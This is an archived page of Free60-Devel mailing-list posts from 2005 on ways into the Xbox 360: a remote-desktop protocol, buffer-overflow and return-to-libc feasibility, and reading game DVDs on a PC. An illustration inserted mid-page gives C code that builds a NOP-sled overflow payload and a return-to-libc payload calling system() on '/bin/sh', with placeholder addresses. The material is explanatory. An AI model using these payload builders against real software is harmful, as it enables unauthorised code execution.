Re: [Free60-Devel] A possible first way in

2005-12-01 Thread smo
On 01/12/05, Ed Schouten [EMAIL PROTECTED] wrote:
 Which means the Windows x86 binaries are not running on the Xbox360
 itself. The only way we could exploit this situation is if there was a
 security hole in that network protocol.

Isn't the protocol RDP (aka Terminal Services)? There's a free
open-source client for it at: http://www.rdesktop.org/

It's a complicated beast though.

-smo


---
This SF.net email is sponsored by: Splunk Inc. Do you grep through log files
for problems?  Stop!  Download the new AJAX search engine that makes
searching your log files as easy as surfing the  web.  DOWNLOAD SPLUNK!
http://ads.osdn.com/?ad_idv37alloc_id865op=click
___
free60-devel mailing list
free60-devel@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/free60-devel


Re: [Free60-Devel] Possibility for exploit

2005-11-29 Thread smo
On 29/11/05, Segin [EMAIL PROTECTED] wrote:
 Has anyone thought of trying a return-to-libc type of exploit? I know
 that the library D3D9 is DirectX 9's Direct3D library. See if we can
 find some exploits on a standard x86 PC regarding that, then see if we
 can apply them on a xbox 360.

Correct me if I'm wrong, but a return-into-libc (or return into any
lib) exploit depends on the functionality provided by the library.
Unix return-to-libc exploits use system() to open a shell. There are
probably much more interesting libs than the Direct 3D lib.

There have been a lot of suggestions on buffer overflows, but even with
my limited experience in buffer overflows, I cannot emphasize enough
that for a successful buffer overflow exploit you need lots of
information:

1) For a regular buffer overflow, you need to know the stack location
to be able to produce a return address to your exploit code
before/after the return pointer on stack. Same goes for
non-return-address-pointer exploits (code on heap).

2) For a return-to-libc call you need to know the memory locations for
the desired library functions.

Basically you need at least a detailed memory map. If you cannot debug
or examine the memory of a running system, bruteforcing the addresses
can be a time-consuming task (even with lots of NOP padding in the
exploit code, 256 megabytes of memory is a huge space for a few
kilobytes of code). Disassembly of the affected function(s) is almost
a requirement too.

If the stack is in a memory page marked non-executable or protected using
software generated canaries, you obviously need to use a return to
libc exploit or a stack bypassing technique (such as one described in
Phrack #56).

I think there's still much groundwork to be done before a buffer
overflow can be successful. Sometimes people mistake just about any
crash on a system which is being fed invalid data as a buffer
overflow. If you can't reverse-engineer the crashing routine, you
might be banging your head against a wall for a long time trying to
get exploit code running.

I might sound a bit negative, but I believe this is the reality we're
facing. However, new information seems to keep coming every day and
I'm looking forward to the first decrypted binaries that can be fed
through a disassembler.

-smo


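As an added illustration of points 1 and 2 in the post above (example code written for this page, not code from the original post or from the Free60 project), here are the two payload layouts being discussed, in C, for the 32-bit x86 case the thread uses as its reference. Every offset and address in it (64 bytes from the buffer to the saved return address, 0xbffff000, 0x00123000, 0x42010000 and so on) is a made-up value standing in for what a disassembly or a memory map would actually supply, and the little-endian, cdecl layout assumed here is x86-specific and does not carry over unchanged to another CPU.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Store a 32-bit value little-endian, as a 32-bit x86 stack expects. */
static void put32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v & 0xff);
    p[1] = (unsigned char)((v >> 8) & 0xff);
    p[2] = (unsigned char)((v >> 16) & 0xff);
    p[3] = (unsigned char)((v >> 24) & 0xff);
}

/* Read a little-endian 32-bit value back (used to inspect a built payload). */
uint32_t get32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/*
 * Layout 1, the "regular" overflow of point 1:
 *   [NOP sled][shellcode][guessed return address, repeated]
 * buf_to_ret is the distance from the start of the overflowed buffer to the
 * saved return address; it comes from disassembling the vulnerable function.
 * The guess is repeated so the payload survives a small error in buf_to_ret
 * (as long as the error is a multiple of 4).
 * Returns the payload length, or 0 if the pieces do not fit.
 */
size_t build_sled_payload(unsigned char *out, size_t outlen, size_t buf_to_ret,
                          const unsigned char *shellcode, size_t sc_len,
                          uint32_t guess, size_t ret_copies)
{
    size_t total = buf_to_ret + 4 * ret_copies;
    if (sc_len > buf_to_ret || total > outlen)
        return 0;
    size_t sled = buf_to_ret - sc_len;
    memset(out, 0x90, sled);                     /* 0x90 = x86 NOP */
    memcpy(out + sled, shellcode, sc_len);
    for (size_t i = 0; i < ret_copies; i++)
        put32(out + buf_to_ret + 4 * i, guess);
    return total;
}

/* 1 if a guessed return address lands inside the sled [sled_base, sled_base + sled_len). */
int guess_hits_sled(uint32_t guess, uint32_t sled_base, size_t sled_len)
{
    return guess >= sled_base && (uint64_t)guess < (uint64_t)sled_base + sled_len;
}

/*
 * Brute force without a memory map: try a guess every `step` bytes across the
 * window [lo, hi). Returns the number of attempts until a guess lands in the
 * sled, or 0 if none ever does (which is guaranteed whenever sled_len < step).
 */
size_t bruteforce_attempts(uint32_t lo, uint32_t hi, uint32_t step,
                           uint32_t sled_base, size_t sled_len)
{
    size_t attempts = 0;
    for (uint64_t g = lo; g < hi; g += step) {
        attempts++;
        if (guess_hits_sled((uint32_t)g, sled_base, sled_len))
            return attempts;
    }
    return 0;
}

/*
 * Layout 2, return-into-libc of point 2, 32-bit x86 cdecl:
 *   [padding][address of system()][return address for after system()][pointer to "/bin/sh"]
 * All three addresses must be known exactly; there is no sled to absorb a
 * wrong guess, which is why the post calls for a detailed memory map.
 */
size_t build_ret2libc_payload(unsigned char *out, size_t outlen, size_t buf_to_ret,
                              uint32_t system_addr, uint32_t after_ret, uint32_t cmd_ptr)
{
    size_t total = buf_to_ret + 12;
    if (total > outlen)
        return 0;
    memset(out, 'A', buf_to_ret);
    put32(out + buf_to_ret, system_addr);
    put32(out + buf_to_ret + 4, after_ret);
    put32(out + buf_to_ret + 8, cmd_ptr);
    return total;
}

int main(void)
{
    /* All offsets and addresses below are made-up illustration values. */
    unsigned char buf[256];
    const unsigned char sc[4] = { 0xcc, 0xcc, 0xcc, 0xcc }; /* placeholder "shellcode": four int3 */
    size_t n = build_sled_payload(buf, sizeof buf, 64, sc, sizeof sc, 0xbffff000u, 4);
    printf("sled payload: %zu bytes, saved EIP overwritten with 0x%08x\n",
           n, (unsigned)get32(buf + 64));
    printf("4 KB sled somewhere in 256 MB, guessed at 4 KB steps: %zu attempts\n",
           bruteforce_attempts(0, 0x10000000u, 0x1000, 0x00123000u, 0x1000));
    printf("256-byte sled at the same step size: %zu attempts (0 = never found)\n",
           bruteforce_attempts(0, 0x10000000u, 0x1000, 0x00123800u, 0x100));
    n = build_ret2libc_payload(buf, sizeof buf, 64, 0x42010000u, 0x42020000u, 0x42030000u);
    printf("ret2libc payload: %zu bytes\n", n);
    return 0;
}
```

The brute-force helper makes the post's "256 megabytes is a huge space" point concrete: stepping through the window only works if the sled is at least as long as the step, so with a few kilobytes of sled you are looking at tens of thousands of attempts even in the best case, and the ret2libc layout offers no such slack at all.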


Re: [Free60-Devel] Re: Game DVD formats

2005-11-28 Thread smo
That was under the subtitle Speculation, so I guess no one has
really tried it yet. I found some threads on some forums that say
Xbox1's DVD drive works on a PC (though nothing too concrete).

On 28/11/05, Constantin Hofstetter [EMAIL PROTECTED] wrote:
 Mhh.. and the http://www.free60.org/wiki/DVD page tells us that:

 The DVD-ROM doesn't work on a standard pc workstation

 - I am gonna change that to The DVD-ROM doesn't work on a standard pc workstation, yet.
 :)

 On 11/28/05, Constantin Hofstetter [EMAIL PROTECTED] wrote:
  The HDD also uses a normal SATA hookup - read on free60 on that ;)

  http://www.free60.org/wiki/Harddrive

  On 11/28/05, Sheldon Neuberger [EMAIL PROTECTED] wrote:
   That sounds promising... Does the 360's HDD use a regular SATA hookup? Does anyone here have a 360 that they could try this with?

   On Mon, 28 Nov 2005 15:12:52 -0500, Constantin Hofstetter [EMAIL PROTECTED] wrote:
    How about connecting the DVD drive from the xbox360 to the pc? ;)
    Yes, it has a special power plug, but leave that in the xbox360, connect sata to the PC and fire up both -
    I wonder what the results would be ...

    Consti

    On 11/28/05, smo [EMAIL PROTECTED] wrote:
     Hello,

     No problem :) I wouldn't say I know lots, but at least some basics. Basically my point is that unless the disc format is such that a PC DVD drive's optics cannot pick up the data from the disc, I don't think it's a too far-fetched idea that it could be read with a PC DVD drive (with a modified firmware).

     On the topic of DVD drives, is there any more info on the Xbox DVD drive? Is there a comparable PC version of the drive available as there was for the original Xbox?

     On 28/11/05, Darren Coles [EMAIL PROTECTED] wrote:
      Sorry, I just assumed you didn't know anything about the low level disc formats. I think most people just think that the data in a raw disc image (for example) just gets written straight to the disc as pits and troughs translated from the 0's and 1's.

      I'm not too hot on the differences between CD and DVD formats at that level but I presume they are pretty much the same.

      In my message, I was referring to formats that are 'uncopyable' rather than 'unripable'.

      If you don't want the disc to be able to be read on a pc, then it could be done by having multiple sessions, where the first session is closed and the second session starts at a specific offset into the disc. I think the dreamcast did something along these lines in addition to the second session being higher density than a normal cd.

      Basically the same as the TOC thing, but without a firmware change the normal cd/dvd drive probably wouldn't be able to find the second session.

      -----Original Message-----
      From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of smo
      Sent: 28 November 2005 17:45
      To: free60-devel@lists.sourceforge.net
      Subject: Re: [Free60-Devel] Re: Game DVD formats

       Hi,

       I'm aware of basics of CD format (apparently DVD is a lot alike though?) and I didn't imply the format was a simple thing. At least part of the disc is standard DVD, since it can be read on a PC as DVD-video. The DVD drive in both Xboxes is supposed to be a pretty standard DVD-drive with some Xbox specific things (and by that I mean the difference is in the firmware, not in the optics, correct?).

       Looks like weak sectors are used by SafeDisc protection on PC and they seem to have no problem ripping those...

       On 28/11/05, Darren Coles [EMAIL PROTECTED] wrote:
        At the lowest level, CD and DVD formats are a lot more complicated than you might think. It's not just a case of writing the 0's and 1's from the data you want to store onto disc.

        There are several layers of error correction and the fact that the data has to be encoded in such a way that it can be read back reliably.

        If you want to know more, try googling for EFM (eight fourteen modulation) and 'Weak sectors'

        -----Original Message-----
        From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of smo
        Sent: 28 November 2005 17:02
        To: free60-devel@lists.sourceforge.net
        Subject: [Free60-Devel] Re: Game DVD formats

         Hello,

         My messages sounded a lot like it was about game piracy. My apologies, it definitely wasn't about that - I'm more interested in how the security functions from end-to-end.

         On 28/11/05, smo [EMAIL PROTECTED] wrote:
          Hi,

          What's so special about current game console DVD formats that render them uncopyable on a PC? They do contain somewhat standard DVD